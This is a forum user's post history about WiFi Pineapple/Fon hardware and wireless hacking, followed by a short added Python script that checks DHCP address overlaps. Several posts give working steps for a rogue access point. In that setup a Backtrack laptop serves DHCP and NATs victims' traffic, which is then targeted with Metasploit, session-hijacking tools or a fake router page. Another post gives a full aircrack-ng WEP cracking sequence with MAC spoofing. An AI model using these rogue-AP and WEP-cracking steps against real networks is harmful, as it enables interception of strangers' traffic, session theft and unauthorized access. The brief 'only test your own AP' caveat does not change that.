easycheese

Everything posted by easycheese

  1. My site talks you through setting up Backtrack4 and Fon for this very purpose: www.dc425.org/dhcp. Though I know that site states that you need a crossover cable, I am not using one and it works fine for me. This setup will get internet sharing working so those connected to the Fon will be able to browse, and all traffic will come over the wire through your laptop and out your wireless. DHCP is shown on the leases list, and my tutorial shows you how to see when a new lease is added. Also, once connected you just point Metasploit on eth0 and you will be able to target those that connect. I hope it helps; let me know if you have any other questions. I can also make a quick tutorial on using Metasploit with this setup if you want.
  2. "Debricking -- Console access via Serial". That is the first post on the forum under this topic; it will tell you what you need to know.
  3. The WRT54G V7 has an Atheros AR2317 chipset with 2 MB of flash memory.
  4. Yeah, I'm planning on buying a Fon+. Currently I have the Fon 2100.
  5. Quoted from the Store: "The WiFi Pineapple comes assembled as a Fon 2100 with soldered on 4 AA battery holder with on/off switch housed inside a plastic pineapple shell. The original Fon case and US power adapter as well as Hak5 and Battle Pineapple stickers are included."
  6. Yeah, I agree. I'm not sure why it is set to zero either. It might be how dd-wrt is when it's installed. I have only ever played with OpenWRT, so I'm still learning all that is dd-wrt.
  7. You get the pineapple, power supply, original Fon case, stickers, battery pack connected to the Fon, and instructions on using the Fon for the first time.
  8. I noticed that as well. I too had weak signal until I adjusted it. I believe the stock Fon antenna is only a 1.5 dB gain antenna.
  9. What options are you getting? You said you don't get all the options, right?
  10. In backpack: Acer Aspire One DualBoot WinXP/Backtrack4 w/ EDGE/UMTS Modem, Work laptop Dell 650 XP, Fon with Jasager, Nokia 770, Bluetooth GPS Puck, USB Bluetooth hub, 2 Edge/UMTS Modems, cat5 cables, Screw Drivers, Batteries, Linux Pocket guide, headphones, mouse, Pen and paper, usb cables, microSD to SD converter, 1 extra CellPhone
  11. The pictures didn't copy over, but if you check my site you can see them.
  12. This is how I have my setup; I'm using Backtrack and the Pineapple. I have the Pineapple connected to my lappy with cat5, and have Backtrack running a DHCP server. This is a first tech article I wrote; let me know if I'm missing something or if you try this setup and have problems. It's located at: www.dc425.org/dhcp

      1. For this I'm using DHCP3 as my DHCP server.
      2. I also used Darren Kitchen's tutorial on Hak5.org for ICS.
      3. I created this so I can use the setup of "evil wifi" located here.

      Software needed:

      1. Backtrack4
      2. Dhcp3
      3. A Brain

      I used Darren's setup for ICS for Windows for my Fon, so I can use it both on Windows and Linux. I did the following setup on the Fon.

      Let's assume that you have successfully installed Der Jasager as per this tutorial. Once you've done this go ahead and log in to Der Jasager's webif interface using a web browser. In my case it was http://192.168.1.1/webif.html. Click the "Network" tab. Change the drop down box next to "Connection Type" from whatever it is set to, to something like Static IP and then back to DHCP. Do this a couple of times. For some reason, in my webif interface, when I change to DHCP, not all settings are available until I do this. In any case, you'll want to see these options:

      Change the IP address to something on the same subnet as your non-Internet Connection Shared NIC (that's "Atheros" on eniac). I changed the IP in the webif interface to 192.168.0.250. Set the Netmask to the default class C address (255.255.255.0). Save your configuration twice. Once using the "Save Changes" button and then again using the "Apply Changes" button. I saved the changes this way, just to be safe. Now, remove power from the Fonera that's running Der Jasager. Re-associate the ICS'ed NIC to its original access point. In my case, I re-associated "Alfa" to "WRT54G". Wait a minute, and reapply power to the La Fonera. Then wait a while for the Fonera to boot and the non-ICS'ed NIC ("Atheros" in my case) to associate to "OpenWrt".

      You can now open Der Jasager's web interface in a browser, by connecting and authenticating to the new IP address you just set up. In my case that would be http://192.168.0.250. Here's how mine looks.

      After that, let's set up the DHCP server on Backtrack.

      DHCP3 how-to:

      I first updated dhcp3 on Backtrack4. You don't have to do this, but if you want, do:

      ```
      sudo apt-get install dhcp3-server
      ```

      Then I backed up dhcp.conf and erased the contents of the file. It's located at the following: /etc/dhcp3/dhcp.conf

      This is what my dhcp.conf file looks like:

      ```
      ddns-updates off;
      option T150 code 150 = string;
      deny client-updates;
      one-lease-per-client false;
      allow bootp;
      ddns-update-style none;
      option domain-name-servers 208.67.222.222, 208.67.220.220;
      default-lease-time 600;
      max-lease-time 7200;
      authoritative;

      # Subnet served on the wired interface that faces the Fon
      subnet 192.168.0.0 netmask 255.255.255.0 {
        interface eth0;
        range 192.168.0.2 192.168.0.254;
        default-lease-time 600;
        max-lease-time 7200;
        option subnet-mask 255.255.255.0;
        option broadcast-address 192.168.0.255;
        option routers 192.168.0.2;
        option domain-name-servers 208.67.222.222, 208.67.220.220;
      }
      ```

      Then I edited /etc/network/interfaces; under auto eth0 this is what I have:

      ```
      auto eth0
      iface eth0 inet static
          address 192.168.0.1
          netmask 255.255.255.0
          # network and broadcast corrected to match the /24 netmask above
          network 192.168.0.0
          broadcast 192.168.0.255
      ```

      Then you must tell the dhcp3-server what adapter to listen to. This is located at /etc/default/dhcp3-server. Edit that file and under INTERFACES add eth0. It should look like the following:

      ```
      INTERFACES="eth0"
      ```

      Next I set the IP address of eth0:

      ```
      sudo ifconfig eth0 inet 192.168.0.2
      ```

      Next you have to allow all connections through iptables out through the world. Depending on the adapter that is connected to the internet you will have to change it in the command. In the command that I used, I let the connection out through my wireless, so I use wlan0.

      ```
      sudo iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE
      ```

      You also need to allow IP forwarding:

      ```
      echo 1 > /proc/sys/net/ipv4/ip_forward
      ```

      Now you need to connect the Fon to your laptop. Once connected, start the DHCP server by entering the following:

      ```
      sudo /etc/init.d/dhcp3-server start
      ```

      Once started, you can check for DHCP leases with the following:

      ```
      # dhcp3-server keeps its lease database in dhcpd.leases
      cat /var/lib/dhcp3/dhcpd.leases
      ```

      Now you can start up Hamster and Ferret. Also you can run an Apache server, with a fake router page, or whatever you want.
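
An added example, not part of the post above: a dynamic range that covers addresses already configured statically (here the `option routers` address and the Fon's webif address) risks address conflicts, so this sketch checks a subnet declaration for that overlap. `check_subnet`, `STATIC_HOSTS` and its labels are names assumed for this example; the sample block is copied from the posted configuration.

```python
import ipaddress
import re

# Subnet block from the dhcp.conf posted above (copied here as sample input).
SAMPLE_CONF = """
subnet 192.168.0.0 netmask 255.255.255.0 {
  interface eth0;
  range 192.168.0.2 192.168.0.254;
  option broadcast-address 192.168.0.255;
  option routers 192.168.0.2;
}
"""

# Fixed addresses mentioned in the post; the labels are this example's own.
STATIC_HOSTS = {"Fon webif": "192.168.0.250", "eth0 (interfaces file)": "192.168.0.1"}


def check_subnet(conf, static_hosts):
    """Return warnings for the first subnet declaration found in conf."""
    net_m = re.search(r"subnet\s+([\d.]+)\s+netmask\s+([\d.]+)", conf)
    rng_m = re.search(r"\brange\s+([\d.]+)\s+([\d.]+)\s*;", conf)
    if not net_m or not rng_m:
        raise ValueError("no subnet/range declaration found")
    net = ipaddress.ip_network(f"{net_m.group(1)}/{net_m.group(2)}")
    lo, hi = (ipaddress.ip_address(a) for a in rng_m.groups())
    warnings = []
    if lo > hi or lo not in net or hi not in net:
        warnings.append(f"range {lo}-{hi} does not fit inside {net}")
    fixed = dict(static_hosts)
    router = re.search(r"option\s+routers\s+([\d.]+)", conf)
    if router:
        fixed["option routers"] = router.group(1)
    for label, addr in fixed.items():
        ip = ipaddress.ip_address(addr)
        if ip not in net:
            warnings.append(f"{label} {ip} is outside {net}")
        elif lo <= ip <= hi:
            warnings.append(f"{label} {ip} is inside the dynamic range {lo}-{hi}")
    bcast = re.search(r"option\s+broadcast-address\s+([\d.]+)", conf)
    if bcast and ipaddress.ip_address(bcast.group(1)) != net.broadcast_address:
        warnings.append(f"broadcast {bcast.group(1)} should be {net.broadcast_address}")
    return warnings


if __name__ == "__main__":
    for line in check_subnet(SAMPLE_CONF, STATIC_HOSTS):
        print("WARNING:", line)
```
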
  13. If you're using Backtrack you can use the commands:

      1. `ifconfig [interface] down`
      2. `sudo ifconfig [interface] hw ether [MAC Address]`
      3. `ifconfig [interface] up`

      Command 2 will look something like: `sudo ifconfig wlan0 hw ether 00:11:22:33:44:55`
  14. Yeah, like I was saying, my Orinoco AP2000 AP will only let me inject 15 packets a second. Anything more than that, it just rejects the traffic from my laptop. I would try and lower the injection rate. Let's say you used the fragment attack. Then to replay the packet you forged using packetforge, you use `aireplay-ng -2 -x 150 -r packet [interface]`. `-x` lets you say how many packets a second you inject. I would try and lower the number until you find how much you can inject before your AP stops allowing you to inject.
  15. This is my airbase-ng script http://www.dc425.org/softap
  16. I don't have first-hand experience, but the ones I have used worked well.
  17. Let me know how it goes. The `-x 150` is how many packets you inject every second. I found that most APs work the best with injecting 150 a second. Now that being said, I have an Orinoco AP2000 that will only let me inject 20 a second before it deauths me and will not let me fake auth.
  18. What WiFi card are you using? Did you try and test the injection percentage?

      `aireplay-ng -9 interface`

      That should tell you injection is working and a percentage on how well it was able to inject. Also, what attack are you running? I have the best luck with packet fragmentation; I believe that's option 5. I usually set up airodump on the AP:

      `airodump-ng -c 11 --bssid 00:11:22:33:44:55 -w /tmp/owned interface`

      then fake auth on the router:

      `aireplay-ng -1 30 -a {MAC of AP} interface`

      then:

      `aireplay-ng -5 -b {MAC of AP} interface`

      After it finds a packet and writes the fragmentation to your drive, run packetforge to create a packet to replay back to the AP:

      `packetforge-ng -0 -a {MAC of AP} -h {MAC OF YOUR CARD} -k 255.255.255.255 -l 255.255.255.255 -y {The fragmentation file that was created, should end with .xor} -w packet`

      (`-w` is writing the packet to replay back to the AP.) Then use aireplay again to replay "packet" to the AP:

      `aireplay-ng -2 -x 150 -r packet interface`

      After gathering some IVs, run aircrack for some good ol' fun:

      `aircrack-ng capturefile`

      *Remember, only test your own AP.*